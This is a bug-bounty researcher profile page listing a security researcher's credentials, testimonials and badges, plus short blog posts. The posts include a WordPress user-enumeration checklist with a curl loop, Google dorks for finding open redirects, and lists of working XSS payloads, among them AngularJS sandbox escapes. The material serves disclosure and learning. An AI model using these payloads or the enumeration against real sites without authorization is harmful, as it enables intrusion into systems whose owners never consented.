Report a Vulnerability
Submit, help fixing, get kudos.
Start a Bug Bounty
Run your bounty program for free.
732,724 coordinated disclosures
435,644 fixed vulnerabilities
1140 bug bounties with 2,190 websites
20,542 researchers, 1255 honor badges

MiguelSantareno | Security Researcher Profile


Security researcher MiguelSantareno has already helped fix 1012 vulnerabilities.



Researcher reputation:  230

Real name:
Miguel Santareno

About me:
Public work and profiles:
http://miguelsantareno.eu

https://hackerone.com/miguel_santareno

https://www.intigriti.com/profile/miguelsantareno

https://bugcrowd.com/MiguelSantareno

https://app.cobalt.io/MiguelSantareno

https://www.exploit-db.com/google-hacking-database author 9699

https://tryhackme.com/p/MiguelSantareno

https://pentesterlab.com/profile/Miguelsantareno

https://www.hackthebox.eu/profile/19625

How to contact me:
[email protected]

Alternative Contacts:
https://twitter.com/MiguelSantareno

https://www.linkedin.com/in/miguelsantareno

Certifications & Diplomas:
MTA Security Essentials
CEH
CPTE
ISO/IEC 27001

Experience in Application Security
1-3 years

Award / Bug Bounty I prefer:
Recommendations.
Swag.
Money.

Halls of Fame:
Oracle Bosch General Motors U.S. Dept Of Defense Alibaba CERT-EU Ford
IBM BMW trend micro randstad SAP Nokia SonicWall Siemens Philips, United Nations United Nations Woman Trend Micro Sony etc...

Follow me on:
Twitter
LinkedIn

Recommendations and Acknowledgements

@bmpbraga     16 March, 2020
    Twitter bmpbraga Bruno from Weasy:
Thanks to Miguel that reported a XSS vulnerability in one of our websites.
Excellent service.

The problem is now solved and tested.
Great help, Many thanks
@PaulMar23292621     20 January, 2020
    Twitter PaulMar23292621 Martin from A1 Telekom Austria:
Miguel showed us several information disclosure issues with our site. Thank you very much Miguel!
@uniteddomains     17 January, 2020
    Twitter uniteddomains Lubos from united-domains AG:
Miguel helped us to identify several bugs in our wordpress instances. His reports were sufficiently detailed and communication was flawless and fast. Thank you very much!
@NeneLand     2 January, 2020
    Twitter NeneLand Lorenzo Zotano from Giants Gaming:
Miguel found a important security issue in our webpage and send us very good information about solutions. Thanks a lot.
@FeroxHosting     30 December, 2019
    Twitter FeroxHosting Luc from Ferox Hosting:
Miguel found a issue in our wordpress site and was quick to report it. Thank you
@DragonSGA     17 July, 2018
    Twitter DragonSGA Stefan from Cadenas:
Miguel has found a XSS vulnerability in our search page. The example he gave helped to test our fix. Thank you!
@Lewisdh47     15 May, 2018
    Twitter Lewisdh47 Dave from Avis:
I would like to thank Miguel for identifying the security issue, providing all relevant information to enable a fix to be deployed and confirming the resolution. Incredibly useful to get his input on the issue and his very helpful steps to reproduce were appreciated. Very helpful and friendly.
@bubblegate     9 May, 2018
    Twitter bubblegate James Murrells from Bubblegate:
Identified an XSS vulnerability on our website and was very friendly and supportive! Many thanks.
@pmiguelr75     26 September, 2017
    Twitter pmiguelr75 Pedro Rodrigues from Bluesoft:
Identified an XSS vulnerability in one website and show us where is it.
After that made changes in code to solve it
All solved.
Great help, great support.
@thenrique     22 September, 2017
    Twitter thenrique Tulio from Spirit Fanfics:
dentified an XSS vulnerability in our website and provided all the details in order to solve it. Very friendly. Thanks

Shows the first 10 recommendations. See all.

Please login via Twitter to add a recommendation

Honor Badges


Number of Secured Websites

10+ Secured Websites Badge
50+ Secured Websites Badge
500+ Secured Websites Badge
Web Security Veteran Badge
10+ Websites
50+ Websites
500+ Websites
WEB SECURITY VETERAN
1000+ Websites

Advanced Security Research

WAF Bypasser Badge
CSRF Master Badge
AppSec Logic Master Badge
Fastest Fix Badge
WAF Bypasser
CSRF Master
30+ Reports
AppSec Logic Master
30+ Reports
Fastest Fix
Fix in 24 hours

Outstanding Achievements

Secured OBB Badge
OBB Advocate Badge
Improved OBB Badge
Secured OBB
OBB Advocate
Improved OBB

Commitment to Remediate and Patch

Patch Master Badge
Patch Guru Badge
Patch Lord Badge
Patch Master
55% Patched
Patch Guru
65% Patched
Patch Lord
75% Patched

Recommendations and Recognition

REPUTABLE Badge
FAMOUS Badge
GLOBALLY TRUSTED Badge
REPUTABLE
10+ Recommends
FAMOUS
25+ Recommends
GLOBALLY TRUSTED
50+ Recommends

Distinguished Blog Author

Distinguished Blog Author Badge
Distinguished Blog Author Badge
Distinguished Blog Author Badge
1 Post
3 Posts
5+ Posts

Research Statistics



Total reports:1448
Total reports on VIP sites:97
Total patched vulnerabilities:1012
Total vulnerabilities on Hold (Open Bug Bounty):45
Recommendations received:19
Active since:20.06.2017

Open Bug Bounty Certificate


Researcher Certificate

05.09.2019  Wordpress basic auditing

Wordpress Read me
target/readme.html

Wordpress License with wordpress version
target/license.txt

Wordpress sample config:
target/wp-config-sample.php

Wordpress installation:
target/wp-admin/install.php

Wordpress upgrade file:
target/wp-admin/upgrade.php

Wordpress setup config:
target/wp-admin/setup-config.php

Wordpress Api usefull paths:
target/wp-json/wp/v2/users - enumerate users
target/wp-json/wp/v2/posts - enumerate posts
target/wp-json - wordpress api

Script to enumerate users thought authors of blog:
for i in {1..30}; do curl -s -L -i target | grep -E -o "\" title=\"View all posts by [a-z0-9A-Z-.]|Location:." | sed 's/\// /g' | cut -f 6 -d ' ' | grep -v "^$"; done

Wordpress Plugins readme or license:
target/wp-content/plugins/plugin name/readme.txt or /license.txt

Wordpress Theme readme or license:
target/wp-content/theme/nome-do-theme/readme.txt, /changeglog.txt or /license.txt

05.09.2019  Payloads for all type off web attacks

02.04.2019  Google Dorks to find open redirects:

inurl:url=https
inurl:url=http
inurl:u=https
inurl:u=http
inurl:redirect?https
inurl:redirect?http
inurl:redirect=https
inurl:redirect=http
inurl:link=http
inurl:link=https

02.04.2019  Cross Site Script angular payloads:

1.0.1 - 1.1.5

Mario Heiderich (Cure53)

{{constructor.constructor('alert(1)')()}}

1.2.0 - 1.2.1

Jan Horn (Google)

{{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}}

30.03.2019  List off basic Cross site script playloads

"><svg/onload=prompt(/OPENBUGBOUNTY/)>
'"--!><img src=x onerror=alert("OPENBUGBOUNTY")> 
'"/><svg/onload=prompt(/OPENBUGBOUNTY/)>
'"><script>alert("OPENBUGBOUNTY")</script>
'"><script>confirm("OPENBUGBOUNTY")</script>
'"><script>prompt("OPENBUGBOUNTY")</script>
'"><svg/onload=alert(/OPENBUGBOUNTY/)>
'"><svg/onload=confirm(/OPENBUGBOUNTY/)>
'"><svg/onload=prompt(/OPENBUGBOUNTY/)>
'>"/><svg/onload=prompt(/OPENBUGBOUNTY/)>
<Img src = x onerror = "javascript: window.onerror = alert; throw XSS">
<img  src="x:gif" onerror="window['al\u0065rt'](0)"></img>
<svg/onload=prompt(/OPENBUGBOUNTY/)>
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert("OPENBUGBOUNTY")//>\x3exss.txt

'"><svg/onload=prompt`1`>
'"><svg/onload=alert`1`>
'"><svg/onload=confirm`1`>
'"><script>alert`1`</script> 
><script>alert`1`</script> 
'"><svg onload=prompt`openbugbounty`>
'"><svg onload=alert`openbugbounty`>
'"><svg onload=confirm`openbugbounty`>
<!'/*!"/*!/'/*/"/*--!><Input/Autofocus/*/Onfocus=confirm`OPENBUGBOUNTY`//><Svg>/
'"><svg/onload=alert(/openbugbounty/)>

Reported Vulnerabilities

All Submissions VIP Submissions

  Latest Patched

 15.01.2021 gehaltsvergleich.com
 15.01.2021 klerk.ru
 14.01.2021 engineering.com
 14.01.2021 qiqu.me
 14.01.2021 mettl.com
 14.01.2021 medion.com
 14.01.2021 universal.at
 14.01.2021 skillshare.com
 14.01.2021 webnots.com
 14.01.2021 bullguard.com

  Latest Blog Posts

25.12.2020 by _Y000_
How to bypass mod_security (WAF)
10.12.2020 by _Y000_
sql injection to bypass Mod_Security
10.12.2020 by _Y000_
Create encoded sql payloads
26.10.2020 by _r00t1ng_
Bypass Addslashes using Multibyte Character
26.10.2020 by _r00t1ng_
One Payload to Inject them all - MultiQuery Injection

  Recent Recommendations

@smiteworks     15 January, 2021
    Twitter smiteworks:
Rajesh was very helpful in providing information and penetration testing on our site. With this information, we were able to harden our infrastructure.
@matrixrewriter     15 January, 2021
    Twitter matrixrewriter:
We had no idea that this vulnerability existed in many PHP-based websites and you kindly reported it to us. Thanks for your help and all the best for your career!
@JoseLev41970568     14 January, 2021
    Twitter JoseLev41970568:
Specialist in web application penetration tester, student and passionate about computer security and ethical hacking.
@far00t1     14 January, 2021
    Twitter far00t1:
i recommend jose luis for his work and enthusiasm in helping us with our technological infrastructure.
@lorenzoherrera     14 January, 2021
    Twitter lorenzoherrera:
Raajesh reported us a nasty vulnerability that totally slipped through our radars, we didn't even know that was possible! Thanks to him and his thorough report we've been able to solve it and now our site is more secure! Thank you for your time and effor, Rajeesh!